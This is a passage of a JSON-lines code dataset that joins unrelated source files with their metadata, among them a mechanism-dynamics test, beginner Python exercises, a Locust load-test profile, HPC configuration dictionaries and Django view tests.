0.5*multi_dot([E(self.P_rbs_conct),Te_rbs_conct_jcs_c]))\n Q_rbs_rockr_jcs_d = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T,np.zeros((1,3),dtype=np.float64).T],[B(self.P_rbs_rockr,self.ubar_rbs_rockr_jcs_d).T,multi_dot([B(self.P_rbs_rockr,self.Mbar_rbs_rockr_jcs_d[:,0:1]).T,A(self.P_ground),self.Mbar_ground_jcs_d[:,2:3]]),multi_dot([B(self.P_rbs_rockr,self.Mbar_rbs_rockr_jcs_d[:,1:2]).T,A(self.P_ground),self.Mbar_ground_jcs_d[:,2:3]])]]),self.L_jcs_d])\n self.F_rbs_rockr_jcs_d = Q_rbs_rockr_jcs_d[0:3,0:1]\n Te_rbs_rockr_jcs_d = Q_rbs_rockr_jcs_d[3:7,0:1]\n self.T_rbs_rockr_jcs_d = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_rockr),self.ubar_rbs_rockr_jcs_d])),self.F_rbs_rockr_jcs_d]) + 0.5*multi_dot([E(self.P_rbs_rockr),Te_rbs_rockr_jcs_d]))\n\n self.reactions = {'F_ground_jcs_a' : self.F_ground_jcs_a,\n 'T_ground_jcs_a' : self.T_ground_jcs_a,\n 'F_ground_mcs_act' : self.F_ground_mcs_act,\n 'T_ground_mcs_act' : self.T_ground_mcs_act,\n 'F_rbs_crank_mcs_abs' : self.F_rbs_crank_mcs_abs,\n 'T_rbs_crank_mcs_abs' : self.T_rbs_crank_mcs_abs,\n 'F_rbs_crank_jcs_b' : self.F_rbs_crank_jcs_b,\n 'T_rbs_crank_jcs_b' : self.T_rbs_crank_jcs_b,\n 'F_rbs_conct_jcs_c' : self.F_rbs_conct_jcs_c,\n 'T_rbs_conct_jcs_c' : self.T_rbs_conct_jcs_c,\n 'F_rbs_rockr_jcs_d' : self.F_rbs_rockr_jcs_d,\n 'T_rbs_rockr_jcs_d' : self.T_rbs_rockr_jcs_d}\n\n","sub_path":"tests/tests/fourbar.py","file_name":"fourbar.py","file_ext":"py","file_size_in_byte":21281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232297256","text":"# Dictionaries use keys and values to store information\n\nphonebook = {}\nphonebook[\"Alex\"] = 6145320125\nphonebook[\"Tracey\"] = 4324772025\nprint(phonebook)\n#OR\nspicyList = {\n \"Jalepeno\" : \"Sorta spicy\",\n \"Habenero\" : \"Very spicy\",\n \"Bhut Jolokia\" : \"Ultra spicy\"\n }\nprint(spicyList)\n\n# Iterating items in a dictionary is a bit more difficult than lists\nfor pepper, spiceIndex in spicyList.items():\n print(\"The %s is considered %s\" % (pepper, spiceIndex))\n \n# Removing values\ndel spicyList[\"Jalepeno\"]\n#OR\nspicyList.pop(\"Habenero\")\nprint(spicyList)\n\n#Exercise\nphonebook2 = {\n \"John\" : 938477566,\n \"Jack\" : 938377264,\n \"Jill\" : 947662781\n}\n\n# write your code here\nphonebook2[\"Jake\"] = 938273443 #Adding to a 
dictionary***************\nphonebook2.update({\"Peter\" : 6148330960})# Another way to add to a dictionary***********\nphonebook2.pop(\"Jill\")\nprint(phonebook2)\n\n# testing code\nif \"Jake\" in phonebook2:\n    print(\"Jake is listed in the phonebook.\")\nif \"Jill\" not in phonebook2:\n    print(\"Jill is not listed in the phonebook.\")\n","sub_path":"Dictionaries.py","file_name":"Dictionaries.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196513692","text":"class Solution(object):\n    def numWays(self, n, k):\n        \"\"\"\n        :type n: int\n        :type k: int\n        :rtype: int\n        \"\"\"\n        dp = [[0 for ni in range(n + 1)] for ki in range(k + 1)]\n        for ki in range(1, k + 1):\n            if n >= 1:\n                dp[ki][1] = ki\n            if n >= 2:\n                dp[ki][2] = ki * ki\n            for ni in range(3, n + 1):\n                dp[ki][ni] = dp[ki][ni - 1] * (ki - 1) + \\\n                    dp[ki][ni - 2] * (ki - 1)\n        return dp[k][n]\n\n\nsol = Solution()\nret = sol.numWays(3, 2)\nret = sol.numWays(3, 3)\nprint(ret)\n","sub_path":"src/paint-fence.py","file_name":"paint-fence.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"299853122","text":"### import ####################################################################\n\nimport WrightTools as wt\n\nimport yaqc_cmds.project.classes as pc\nimport yaqc_cmds.project.widgets as pw\nimport yaqc_cmds.somatic.acquisition as acquisition\nimport yaqc_cmds.hardware.opas as opas\n\n\n### define ####################################################################\n\n\nmodule_name = \"SHUTTER\"\n\n\n### Worker ####################################################################\n\n\nclass Worker(acquisition.Worker):\n    def process(self, scan_folder):\n        pass\n\n    def run(self):\n        for opa in opas.hardwares:\n            opa = opa.driver\n            if opa.shutter_port is None:\n                continue\n            opa.set_shutter([self.aqn.read(\"shutter\", opa.name)])\n        if not self.stopped.read():\n            self.finished.write(True)  # only if acquisition successful\n\n\n### GUI #######################################################################\n\n\nclass GUI(acquisition.GUI):\n    def create_frame(self):\n        # shared settings\n        input_table = pw.InputTable()\n        self.shutter_state = {\n            hardware.name: pc.Bool() for hardware in opas.hardwares if hardware.driver.shutter_port\n        }\n        for k, v in self.shutter_state.items():\n            input_table.add(k, v)\n        self.layout.addWidget(input_table)\n\n    def load(self, aqn_path):\n        aqn = wt.kit.INI(aqn_path)\n        for k, v in self.shutter_state.items():\n            v.write(aqn.read(\"shutter\", k))\n\n    def save(self, aqn_path):\n        aqn = wt.kit.INI(aqn_path)\n        aqn.write(\n            \"info\",\n            \"description\",\n            f\"SHUTTER: {', '.join(k for k, v in self.shutter_state.items() if v.read())}\",\n        )\n        # shared settings\n        aqn.add_section(\"shutter\")\n        for k, v in self.shutter_state.items():\n            aqn.write(\"shutter\", k, v.read())\n\n\ndef mkGUI():\n    global gui\n    gui = GUI(module_name)\n\n\ndef load():\n    return True\n","sub_path":"yaqc_cmds/somatic/modules/set_shutter.py","file_name":"set_shutter.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264919106","text":"\"\"\"\r\n***************************************************************************************************\r\nThe script examples provided by Cisco for your use are provided for\r\nreference only as a customer courtesy.\r\n\r\nThey are intended to 
facilitate development of your own scripts and software\r\nthat interoperate with Cisco switches and software.\r\n\r\nAlthough Cisco has made efforts to create script examples that will be effective\r\nas aids to script or software development,\r\n\r\nCisco assumes no liability for or support obligations related to the use of the script examples or\r\nany results obtained using or referring to the script examples.\r\n\r\n***************************************************************************************************\r\nMenu - Beta Script - Test Prototype\r\n*** Combine Scrolled Text with Example Frame as Main Frame\r\nDate: 26 Nov 2012 -- R. Stellman\r\n\"\"\"\r\n\r\n# Nexus_Object.py program\r\n\r\nimport socket\r\n\r\nimport os\r\nfrom datetime import datetime\r\nimport time\r\nimport shutil\r\nfrom shutil import *\r\n\r\n\r\nclass Nexus_switch:\r\n\r\n def __init__(self, host, port):\r\n HOST = host # The remote host\r\n PORT = port # The same port as used by the server\r\n\r\n\r\n def s_socket(self,sbuffer,HOST,PORT):\r\n # Sends the buffer to the server\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((HOST, PORT))\r\n s.sendall(sbuffer)\r\n data = s.recv(6500)\r\n s.close()\r\n\r\n return(data)\r\n\r\n def s_read (self,fname = \"a.tmp\"):\r\n # Loads a file into the buffer string\r\n #\r\n nexusLogFile = fname\r\n bufferText=\" ... \"\r\n buffer1 = open(nexusLogFile,'r')\r\n bufferText = buffer1.read()\r\n buffer1.close()\r\n\r\n return(bufferText)\r\n\r\n def s_write (self,fname= \"/bootflash/a.tmp\", bufferText=\"\"):\r\n # ... Write to a file\r\n #\r\n bufferFile = open(fname, 'w')\r\n bufferFile.write(bufferText)\r\n bufferFile.close()\r\n \r\n return()\r\n\r\n def stringNexusFormat (self, bufferText, skip=0):\r\n \"\"\"\\n Format file data for Humans \"\"\"\r\n bufferText = bufferText.replace ('\"[','') \r\n bufferText = bufferText.replace (']','')\r\n bufferText = bufferText.replace (\"'\",\" \")\r\n bufferText = bufferText.replace ('\\\\',' ')\r\n bufferText = bufferText.replace ('\",','\"\\n') # Needed for 'show routes'\r\n bufferText = bufferText.replace (' ,','\\n')\r\n \r\n if (skip == 1): # Buffer Monitor; csv data\r\n bufferText = bufferText.replace (' n','\\n')\r\n \r\n return (bufferText)\r\n ","sub_path":"Nexus_Object.py","file_name":"Nexus_Object.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"229757446","text":"# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\nfrom locust import HttpUser, task, between\nfrom locust import LoadTestShape\nimport json\nfrom math import sin, pi\n\nclass ProfileLoad(LoadTestShape):\n '''\n This load profile starts at 0 and steps up by step_users\n increments every tick, up to target_users. 
After reaching\n target_user level, load will stay at target_user level\n until time_limit is reached.\n '''\n\n target_users = 70\n step_users = 5 # ramp users each step\n time_limit = 3600 # seconds\n\n def tick(self):\n num_steps = self.target_users/self.step_users\n run_time = round(self.get_run_time())\n\n if run_time < self.time_limit:\n if num_steps < run_time:\n user_count = num_steps * self.step_users\n else:\n user_count = self.target_users\n return (user_count,self.step_users)\n else:\n return None\n\nclass TritonUser(HttpUser):\n wait_time = between(1, 1)\n\n @task\n def bert_disconnect(self):\n response = self.client.post(self.url1, headers=self.headers, data=json.dumps(self.data))\n\n @task(3)\n def bert(self):\n response = self.client.post(self.url1, data=json.dumps(self.data))\n \n def on_start(self):\n with open('bert_request.json') as f:\n self.data = json.load(f)\n\n self.url1 = '{}/v2/models/{}/infer'.format(\n self.environment.host,\n 'bert-tier1')\n\n self.headers = {'Connection': 'close'}\n\n","sub_path":"model_serving/gke-triton-priority/locust/locustfile-tier1.py","file_name":"locustfile-tier1.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563680659","text":"\n\n#must use python 2.7\n\nimport re\nimport os\n\n\ndef validCheck(a,b,c,d,e,f,g,h,i):\n if len(a) == 0:\n a.append('NULL')\n return a,b,c,d,e,f,g,h,i\n\n\n\ndef makeNew(a,b,c,d,e,f,g,h,i, outfile):\n for name in a:\n for streak in b:\n for color in c:\n for hardness in d:\n for cleavage in e: \n for fracture in f: \n for luster in g:\n for diaphaneity in h:\n for specificGravity in i:\n outfile.write('{},{},{},{},{},{},{},{},{}\\n'.format(name, streak, color, hardness, cleavage, fracture, luster, diaphaneity, specificGravity))\n\n\ndef parseline(line, infile, rx_entry, rx_stField, rx_endField):\n # we have one line. We need to separate out the fields of multiple values (e.g. 
Tourmaline, \"blue, red, green\", ...)\n    names = []\n    streak = []\n    color = []\n    hardness = []\n    cleavage = []\n    fracture = []\n    luster = []\n    diaphaneity = []\n    other = []\n    specificGravity = []\n\n    inGroup = False\n\n    index = 0\n    \n    # all entries, split by entry with commas, strings, and quotes \n    allEntries = line.split(',')\n    naughtyCharacters = extraCharacters()\n\n    for entry in allEntries:\n        if re.match(rx_stField, entry):\n            inGroup = True\n        if re.match(rx_endField, entry):\n            inGroup = False\n        \n\n        if index == 0:\n            names.append(re.sub(naughtyCharacters, '', entry))\n        if index == 1:\n            streak.append(re.sub(naughtyCharacters, '', entry))\n        if index == 2:\n            color.append(re.sub(naughtyCharacters, '', entry))\n        if index == 3:\n            hardness.append(re.sub(naughtyCharacters, '', entry))\n        if index == 4:\n            cleavage.append(re.sub(naughtyCharacters, '', entry))\n        if index == 5:\n            fracture.append(re.sub(naughtyCharacters, '', entry))\n        if index == 6:\n            luster.append(re.sub(naughtyCharacters, '', entry))\n        if index == 7:\n            diaphaneity.append(re.sub(naughtyCharacters, '', entry))\n        if index == 8:\n            other.append(re.sub(naughtyCharacters, '', entry))\n        if index == 9:\n            specificGravity.append(re.sub(naughtyCharacters, '', entry))\n\n        \n        if inGroup == False:\n            index += 1\n        \n    return names, streak, color, hardness, cleavage, fracture, luster, diaphaneity, specificGravity \n    \n\n\ndef main():\n    # setup input/output path and input/output file\n    cwd = os.path.dirname(__file__) #absolute path to cwd\n    infile = 'minerals.csv'\n    inpath = os.path.join(cwd, infile)\n\n    outfile = 'mineral_input.txt'\n    outpath = os.path.join(cwd, outfile)\n\n    \n    # get regex objects for matching elements\n    elem = elementSyntax()\n    stField = startFieldSyntax()\n    endField = endFieldSyntax()\n\n\n    # pass input, output, regex for parsing\n    # line at a time\n    with open(inpath, 'r') as infile:\n        with open(outpath, 'w') as outfile:\n            for line in infile:\n                a,b,c,d,e,f,g,h,i = parseline(line, infile, elem, stField, endField)\n                #a,b,c,d,e,f,g,h,i = validCheck(a,b,c,d,e,f,g,h,i)\n                makeNew(a,b,c,d,e,f,g,h,i, outfile) \n\n# any element of the mineral table\ndef elementSyntax():\n    entry_syntax = re.compile(r'\"?.+,')\n    return entry_syntax\n\n# an element that signifies the beginning of a field of values (e.g. 
colors for a mineral)\ndef startFieldSyntax():\n entry_syntax = re.compile(\"\\\".+\")\n return entry_syntax\n\n# an element that signifies the end of a field of values \ndef endFieldSyntax():\n entry_syntax = re.compile(\".+\\\"\")\n return entry_syntax\n\ndef extraCharacters():\n entry_syntax = re.compile(r'(^\\ )?(\")?(\\ $)?')\n return entry_syntax\n\n\n\n\nif __name__ == '__main__':\n main();\n","sub_path":"Data/Input/mineralParse.py","file_name":"mineralParse.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80071969","text":"#\n# @lc app=leetcode id=83 lang=python3\n#\n# [83] Remove Duplicates from Sorted List\n#\n# https://leetcode.com/problems/remove-duplicates-from-sorted-list/description/\n#\n# algorithms\n# Easy (41.77%)\n# Total Accepted: 300.7K\n# Total Submissions: 718.4K\n# Testcase Example: '[1,1,2]'\n#\n# Given a sorted linked list, delete all duplicates such that each element\n# appear only once.\n# \n# Example 1:\n# \n# \n# Input: 1->1->2\n# Output: 1->2\n# \n# \n# Example 2:\n# \n# \n# Input: 1->1->2->3->3\n# Output: 1->2->3\n# \n# \n#\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n node = head\n while node:\n pre = node.next\n while pre and pre.val == node.val:\n pre = pre.next\n node.next = pre\n node = node.next\n return head\n","sub_path":"83.remove-duplicates-from-sorted-list.py","file_name":"83.remove-duplicates-from-sorted-list.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"398232796","text":"\"\"\"\nFunctions to handle parsing the config file for multiple super computers\n\"\"\"\n\n#config data\n\nGALAXY_CONFIG = {'base_data_dir' : '/astro/mwavcs/vcs/',\n 'base_product_dir' : '/group/mwavcs/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=pawsey0348',\n 'gpuq': '#SBATCH --account=mwavcs',\n 'copyq': '#SBATCH --account=mwavcs',\n 'zcpuq': '#SBATCH --account=mwavcs'},\n 'module_dir' : '/group/mwa/software/modulefiles',\n 'presto_module' : 'presto/master',\n 'psrcat_module' : 'psrcat/1.59',\n 'cpuq_cluster' : 'magnus',\n 'cpuq_partition' : 'workq',\n 'gpuq_cluster' : 'galaxy',\n 'gpuq_partition' : 'gpuq',\n 'gpu_beamform_mem' : '1024',\n 'zcpuq_cluster' : 'zeus',\n 'zcpuq_partition' : 'workq',\n 'copyq_cluster' : 'zeus',\n 'copyq_partition' : 'copyq',\n 'container_module' : '',\n 'container_command' : '',\n 'prschive_container' : '/pawsey/mwa/singularity/dspsr/dspsr.sif',\n 'ssd_dir' : None,\n 'gid' : 34858} # mwavcs\n\nGARRAWARLA_CONFIG = {'base_data_dir' : '/astro/mwavcs/vcs/',\n 'base_product_dir' : '/group/mwavcs/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=mwavcs',\n 'gpuq': '#SBATCH --account=mwavcs',\n 'copyq': '#SBATCH --account=mwavcs',\n 'zcpuq': '#SBATCH --account=mwavcs'},\n 'module_dir' : '/pawsey/mwa/software/python3/modulefiles/',\n 'presto_module' : 'presto/master',\n 'psrcat_module' : 'psrcat/1.59',\n 'cpuq_cluster' : 'garrawarla',\n 'cpuq_partition' : 'workq',\n 'gpuq_cluster' : 'garrawarla',\n 'gpuq_partition' : 'gpuq',\n 'gpu_beamform_mem' : '25600',\n 'zcpuq_cluster' : 'zeus',\n 'zcpuq_partition' : 'workq',\n 'copyq_cluster' : 'zeus',\n 'copyq_partition' : 'copyq',\n 'container_module' : '', #'singularity',\n 'container_command' : '', #'singularity exec --nv 
/pawsey/mwa/singularity/vcstools_master.sif /bin/bash -c ',\n 'prschive_container' : '/pawsey/mwa/singularity/dspsr/dspsr.sif',\n 'ssd_dir' : '/nvmetmp',\n 'gid' : 34858} # mwavcs\n\nOZSTAR_CONFIG = {'base_data_dir' : '/fred/oz125/vcs/',\n 'base_product_dir' : '/fred/oz125/vcs/',\n 'group_account' : {'cpuq': '#SBATCH --account=oz125',\n 'gpuq': '#SBATCH --account=oz125',\n 'copyq': '#SBATCH --account=oz125',\n 'zcpuq': '#SBATCH --account=oz125'},\n #'module_dir' : '/fred/oz125/software/modulefiles\\nmodule use /apps/users/pulsar/skylake/modulefiles',\n 'module_dir' : '/fred/oz125/software/modulefiles',\n 'presto_module' : 'module use /apps/users/pulsar/skylake/modulefiles\\nmodule load presto/no-python',\n #'presto_module' : 'presto/no-python',\n 'psrcat_module' : 'psrcat/1.49',\n 'cpuq_cluster' : 'farnarkle',\n 'cpuq_partition' : 'skylake',\n 'gpuq_cluster' : 'farnarkle',\n 'gpuq_partition' : 'skylake-gpu',\n 'gpu_beamform_mem' : '25600',\n 'copyq_cluster' : 'farnarkle',\n 'copyq_partition' : 'skylake', #TODO check if there's a better one\n 'zcpuq_cluster' : 'farnarkle',\n 'zcpuq_partition' : 'skylake',\n 'container_module' : 'singularity/latest',\n #removed since I've now installed it on Ozstar\n #'container_command' : 'singularity exec -H /fred/oz125/vcs/1221832280/ --nv /fred/oz125/container_images/vcstools_multi-pixel.simg'\n 'container_command' : '',\n 'prschive_container' : '',\n 'ssd_dir' : '$JOBFS',\n 'gid' : 10169} # oz125\n\nARM_CONFIG = {'base_data_dir' : '/ibo9000/Pulsar/vcs/',\n 'base_product_dir' : '/ibo9000/Pulsar/vcs/',\n 'group_account' : {'cpuq': '',\n 'gpuq': '',\n 'copyq': '',\n 'zcpuq': ''},\n 'module_dir' : '/home/app/modulefiles/',\n 'presto_module' : 'presto/cpu-master',\n #'psrcat_module' : 'psrcat/1.49',\n 'cpuq_cluster' : 'chess',\n 'cpuq_partition' : 'arm',\n 'gpuq_cluster' : 'chess',\n 'gpuq_partition' : 'all-gpu',\n 'gpu_beamform_mem' : '30720',\n 'copyq_cluster' : 'chess',\n 'copyq_partition' : 'arm', #TODO check if there's a better one\n 'zcpuq_cluster' : 'chess',\n 'zcpuq_partition' : 'arm',\n #None currently as we haven't worked out container software\n 'container_module' : '',\n #'container_command' : 'docker run 192.168.6.123:5000/vcstools'}\n 'container_command' : '',\n 'prschive_container' : '',\n 'ssd_dir' : None,\n 'gid' : 10002} # pulsar\n\n\n\n\nimport logging\nimport socket\nimport argparse\n\nlogger = logging.getLogger(__name__)\n\ndef load_config_file():\n \"\"\"\n Work out which supercomputer you are using and load the appropriate config file\n \"\"\"\n #Work out which supercomputer you're using\n hostname = socket.gethostname()\n # galaxy head node, galaxy and magnus job nodes, zeus job nodes, garrawarla job nodes\n if hostname.startswith('galaxy') or hostname.startswith('nid') or hostname.startswith('z'):\n comp_config = GALAXY_CONFIG\n elif hostname.startswith('mwa') or hostname.startswith('garrawarla'):\n comp_config = GARRAWARLA_CONFIG\n elif hostname.startswith('john') or hostname.startswith('farnarkle'):\n comp_config = OZSTAR_CONFIG\n elif hostname.startswith('x86') or hostname.startswith('arm'):\n comp_config = ARM_CONFIG\n else:\n logger.error('Unknown computer {}. 
Exiting'.format(hostname))\n        quit()\n\n    return comp_config\n\n\nif __name__ == '__main__':\n\n    import sys  # needed for the sys.exit() calls below; missing from the module imports\n\n    # Dictionary for choosing log-levels\n    loglevels = dict(DEBUG=logging.DEBUG,\n                     INFO=logging.INFO,\n                     WARNING=logging.WARNING)\n\n    # Option parsing\n    parser = argparse.ArgumentParser(\"Creates a config file (only required to be run on install or when a new supercomputer is added) and has functions for reading them.\")\n\n    parser.add_argument(\"-L\", \"--loglvl\", type=str, help=\"Logger verbosity level. Default: INFO\",\n                        choices=loglevels.keys(), default=\"INFO\")\n\n    parser.add_argument(\"-V\", \"--version\", action='store_true', help=\"Print version and quit\")\n    args = parser.parse_args()\n\n    if args.version:\n        try:\n            import version\n            print(version.__version__)\n            sys.exit(0)\n        except ImportError as ie:\n            print(\"Couldn't import version.py - have you installed vcstools?\")\n            print(\"ImportError: {0}\".format(ie))\n            sys.exit(0)\n\n    # set up the logger for stand-alone execution\n    logger.setLevel(loglevels[args.loglvl])\n    ch = logging.StreamHandler()\n    ch.setLevel(loglevels[args.loglvl])\n    formatter = logging.Formatter('%(asctime)s  %(filename)s  %(name)s  %(lineno)-4d  %(levelname)-9s :: %(message)s')\n    ch.setFormatter(formatter)\n    logger.addHandler(ch)\n    logger.propagate = False\n\n\n    #print config file\n    config = load_config_file()\n    for i in config.keys():\n        logger.info(\"{0}\\t{1}\".format(i,config[i]))\n\n","sub_path":"vcstools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"543115408","text":"import sys, os\nsys.path.append('/lustre/users/wangxinmei/JYModule/')\n\nfrom MethyModule.MethyStatPicPro import StatPic\nfrom MethyModule.MethyStatisticsPro import CStatistics, mCStatistics\nfrom StaticNames import Names\nfrom CommonMethods import saveInterVar, Template\n\ndef myGetCoverage_ContextByGene(project_path, covReport, refSeqBedFile, sampleName):\n    outDirContextByGene=os.path.join(project_path, Names.STR_MCSTATISTICS_FOLDER_NAME, Names.STR_GET_COVERAGE_CONTEXT_BY_GENE)\n    if not os.path.exists(outDirContextByGene):\n        os.makedirs(outDirContextByGene)\n    re_getCoverage_ContextByGene=mCStatistics.getCoverage_ContextByGene(covReport,refSeqBedFile,sampleName,outDirContextByGene,processNum=28)\n    saveInterVar(re_getCoverage_ContextByGene,outDirContextByGene, 're_getCoverage_ContextByGene_'+sampleName)\n    \ndef myGetCoverage_ContextByTransReturnIntersectDir(project_path, covReport, refRegionCGFile, regionBedDir, sampleName):\n    outDirPicByTrans=os.path.join(project_path, Names.STR_CSTATISTICS_FOLDER_NAME, Names.STR_GET_COVERAGE_CONTEXT_BY_TRANS)\n    if not os.path.exists(outDirPicByTrans):\n        os.makedirs(outDirPicByTrans)\n    re_getCoverage_ContextByTrans=CStatistics.getCoverage_ContextByTrans(covReport,refRegionCGFile,regionBedDir,sampleName,outDirPicByTrans,processNum=28)\n    saveInterVar(re_getCoverage_ContextByTrans, outDirPicByTrans, 're_getCoverage_ContextByTrans_'+sampleName)\n    return os.path.join(outDirPicByTrans, sampleName, Names.STR_INTERSECT_FOLDER_NAME)\n\n","sub_path":"WGBS_all_pipes/GetCoverage_ContextByGene_and_Trans.py","file_name":"GetCoverage_ContextByGene_and_Trans.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238072787","text":"import shutil\nimport os\n\n\ndef main():\n    os.chdir(\"FilesToSort\")\n    print(\"working directory is \", os.getcwd())\n\n    filenames = 
os.listdir(\".\")\n print(filenames)\n\n for filename in filenames:\n print(filename)\n file_type = filename[filename.find(\".\")+1:]\n print(file_type)\n try:\n os.mkdir(file_type) # make the directory only if it doesn't already exist\n except FileExistsError:\n print(\"Already exists\")\n shutil.move(filename, file_type)\n\n# try:\n# print(\"make a new directory\")\n# os.mkdir('temp')\n# except FileExistsError:\n# print(\"File exists; pass\")\n\n\nmain()","sub_path":"Prac_09/sort_file.py","file_name":"sort_file.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"98578098","text":"import os\n\nfrom yass.batch import BatchProcessor\n\n\npath_to_neuropixel_data = (os.path.expanduser('~/data/ucl-neuropixel'\n '/rawDataSample.bin'))\n\n\nbp = BatchProcessor(path_to_neuropixel_data,\n dtype='int16', n_channels=385, data_format='wide',\n max_memory='1MB')\n\n# now, let's do some multi_channel operations, here we will traverse all\n# channels and all observations, each batch will contain a subset in the\n# temporal dimension, the window size is determined by max_memory\ndata = bp.multi_channel()\n\nfor d, _, idx in data:\n print('Shape: {}. Index: {}'.format(d.shape, idx))\n\n# we can specify the temporal limits and subset channels\ndata = bp.multi_channel(from_time=100000, to_time=200000, channels=[0, 1, 2])\n\nfor d, _, idx in data:\n print('Shape: {}. Index: {}'.format(d.shape, idx))\n\n\n# we can also create a BatchProcessor with a buffer\nbp2 = BatchProcessor(path_to_neuropixel_data,\n dtype='int16', n_channels=385, data_format='wide',\n max_memory='1KB', buffer_size=10)\n\ndata = bp2.multi_channel(from_time=0, to_time=100000, channels=[0, 1, 2])\n\nfor d, idx_local, idx in data:\n print('Shape: {}. Index (local): {}. 
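The sort_file.py record above derives the destination folder with `filename.find(".")`, which misfires on dotfiles and on names without any extension. A sketch of the more robust `os.path.splitext` approach (the filenames are made up for illustration):

```python
import os.path

for name in ["report.txt", "archive.tar.gz", "README", ".bashrc"]:
    root, ext = os.path.splitext(name)  # "README" and ".bashrc" yield ext == ""
    folder = ext[1:] if ext else "no_extension"
    print(name, "->", folder)
```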
Index: {}'.format(d.shape, idx_local,\n idx))\n","sub_path":"examples/batch/multi_channel.py","file_name":"multi_channel.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162769788","text":"import datetime\nimport os\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import Group\nfrom django.core import mail\nfrom django.urls import reverse\nfrom model_mommy import mommy\nimport xlrd\n\nfrom evap.evaluation.models import Semester, UserProfile, Course, CourseType, TextAnswer, Contribution, \\\n Questionnaire, Question, EmailTemplate, Degree\nfrom evap.evaluation.tests.tools import FuzzyInt, WebTest, ViewTest\n\n\nclass TestUserIndexView(ViewTest):\n url = '/staff/user/'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_num_queries_is_constant(self):\n \"\"\"\n ensures that the number of queries in the user list is constant\n and not linear to the number of users\n \"\"\"\n num_users = 50\n semester = mommy.make(Semester, is_archived=True)\n course = mommy.make(Course, state=\"published\", semester=semester, _participant_count=1, _voter_count=1) # this triggers more checks in UserProfile.can_staff_delete\n mommy.make(UserProfile, _quantity=num_users, courses_participating_in=[course])\n\n with self.assertNumQueries(FuzzyInt(0, num_users - 1)):\n self.app.get(self.url, user=\"staff\")\n\n\nclass TestUserBulkDeleteView(ViewTest):\n url = '/staff/user/bulk_delete'\n test_users = ['staff']\n filename = os.path.join(settings.BASE_DIR, \"staff/fixtures/test_user_bulk_delete_file.txt\")\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_testrun_deletes_no_users(self):\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"user-bulk-delete-form\"]\n\n form[\"username_file\"] = (self.filename,)\n\n users_before = UserProfile.objects.count()\n\n reply = form.submit(name=\"operation\", value=\"test\")\n\n # Not getting redirected after.\n self.assertEqual(reply.status_code, 200)\n # No user got deleted.\n self.assertEqual(users_before, UserProfile.objects.count())\n\n def test_deletes_users(self):\n mommy.make(UserProfile, username='testuser1')\n mommy.make(UserProfile, username='testuser2')\n contribution = mommy.make(Contribution)\n mommy.make(UserProfile, username='contributor', contributions=[contribution])\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"user-bulk-delete-form\"]\n\n form[\"username_file\"] = (self.filename,)\n\n self.assertEqual(UserProfile.objects.filter(username__in=['testuser1', 'testuser2', 'contributor']).count(), 3)\n user_count_before = UserProfile.objects.count()\n\n reply = form.submit(name=\"operation\", value=\"bulk_delete\")\n\n # Getting redirected after.\n self.assertEqual(reply.status_code, 302)\n\n # Assert only these two users got deleted.\n self.assertEqual(UserProfile.objects.filter(username__in=['testuser1', 'testuser2']).count(), 0)\n self.assertTrue(UserProfile.objects.filter(username='contributor').exists())\n self.assertEqual(UserProfile.objects.count(), user_count_before - 2)\n\n\nclass TestSemesterView(ViewTest):\n url = '/staff/semester/1'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n 
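The yass BatchProcessor example above hides the windowing logic inside the library; here is a toy stand-in showing the same contract (a chunk plus its index range) over an in-memory array, with made-up sizes:

```python
import numpy as np

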